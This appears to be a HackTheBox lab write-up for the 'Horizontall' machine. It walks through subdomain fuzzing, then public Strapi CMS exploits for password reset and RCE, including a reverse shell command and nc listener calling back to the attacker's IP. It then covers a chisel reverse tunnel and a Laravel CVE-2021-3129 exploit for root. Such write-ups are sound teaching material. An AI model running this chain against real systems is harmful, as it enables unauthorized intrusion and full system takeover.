Try   HackMD

HTB Writeup - Horizontall

Machine Details

Name: Horizontall

IP address: 10.10.11.105

Difficulty: Easy

Points: 20


Scanning & Enumeration

Upon obtaining the IP address, 10.10.11.105, the first thing to do is to run a scan to figure out what ports and services are running on the machine. I did this using nmap and the result is shown below:

The machine has two services running; SSH on port 22 and HTTP on port 80. The SSH version looks recent so I started my enumeration on the HTTP service running on port 80. From the result, the page redirects to http://horizontall.htb, so I proceeded to add this to my /etc/hosts file.

10.10.11.105 horizontall.htb

Visiting http://horizontall.htb in the browser, I was presented with the following page:

I spent quite some time on this page trying to find a possible entry point but to no avail. I found that the web page uses Vue.js. I ran a directory brute force using gobuster and obtained the following results:

gobuster dir -u http://horizontall.htb -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out

I also tried to run a directory search using various extensions but no positive result. Being on this stage for a while, I decided to run a full port scan on the address to see if other ports are running, but did not find any. Since I have a hostname, horizontall.htb, I decided to search for other subdomains on the hostname. For this purpose, I used wfuzz starting with the subdomains-top1million-5000.txt file from seclists, I did not obtain a result, I used the subdomains-top1million-20000.txt file, no result and finally I used the subdomains-top1million-110000.txt file and I found another subdomain (sometimes wordlist matters).

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" -u http://horizontall.htb --hc 301 -v

I added this newly founded subdomain to the /etc/hosts file.

10.10.11.105 horizontall.htb ********.horizontall.htb

Visiting this subdomain on the browser, I was presented with a page that says "Welcome.".

I performed directory search on this new subdomain using gobuster and I obtained some results:

gobuster dir -u http://********.horizontall.htb -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.********.out

Gaining access to admin dashboard

Visiting /admin on the browser, I was presented with a login page running Strapi CMS.

I searched and tried logging into the dashboard using default creds such as admin:admin, admin:password, etc. to no avail. I then proceeded to searching Google for Strapi CMS and found that this CMS is vulnerable to a couple of remote code execution (RCE) vulnerabilities. One I found interesting is the unauthenticated exploit at https://www.exploit-db.com/exploit/50239. The exploit basically resets the admin password to a given value and provides a JWT token for the session. I downloaded and ran the exploit with the required parameter and was able to successfully reset the admin's password and obtain a JWT key and was able to login into the admin dashboard.

python3 50239.py http://********.horizontall.htb

Initial foothold

At this point, there are two options. The first is to send commands through the cmd shell obtained from the exploit above and wait for possible execution (blind RCE). The second option (which I followed) was to use another RCE exploit (authenticated) to gain a shell on the box. I found an exploit at https://github.com/diego-tella/CVE-2019-19609-EXPLOIT. The exploit takes a domain name or IP address, a JWT token, a listening host IP and a listening port. I ran the exploit and was able to obtain a reverse shell.

python exploit.py -d http://********.horizontall.htb -jwt JWT -l 10.10.14.104 -p 9001

Note: JWT is the token value obtained from 50239.py exploit. Also I had started a listener on my box on port 9001.

nc -lvnp 9001

Now that I have a foothold, the first thing I did was to obtain a proper shell.

ctrl+z
stty raw -echo;fg <ENTER><ENTER>
export TERM=xterm

I then started enumerating the box. I cat'ed the /etc/passwd file and noticed there is a user "developer". I visited the user's home directory and was able to read the user.txt file.

Privilege escalation

After a while I went back to the directory I got a shell into, /opt/strapi/myapi and found a directory "config" that contains some environment configurations. In the development folder, I found mysql creds for the user "developer".

I was able to access mysql with the creds but I obtained nothing much from the database. I tried to login on the box as user "developer" using the password I found but I got password authentication failure error.

After a while of enumeration, I checked the network connections using netstat and I noticed there is a service running on port 8000 locally on the box.

netstat -antp

Port forwarding

In order to access the service, I tunneled the port to my local machine on port 8080. I used chisel to do this (I had to move it to the box using python3 http.server and curl). On my machine I ran the code below:

./chisel server -p 8000 --reverse

While on the box I ran the following code:

./chisel client 10.10.14.104:8000 R:8080:127.0.0.1:8000

Accessing the port on my local machine, I got the page below:

Searching for Laravel8 vulnerabilities on Google, I came across an interesting documentation from bookhacktricks - https://book.hacktricks.xyz/pentesting/pentesting-web/laravel. To verify, I checked that the Laravel setup is in debug mode.

We're root

Down the page, there is link to a Laravel deserialization exploit. I used the exploit at https://github.com/nth347/CVE-2021-3129_exploit. Running the exploit with the required parameters, I was able to obtain a root shell on the box.

And that's Horizontall!


While doing this box, I drew out a little mindmap for myself using XMind. You can find it below:

Although the box is rated as me, for me it was not so much as I ran into a lot of rabbit holes and spent way too much time on some phases. But overall, once I was able to find the correct path, it became straightforward.

tags: hackthebox htb horizontall tunneling port forwarding chisel StrapiCMS laravel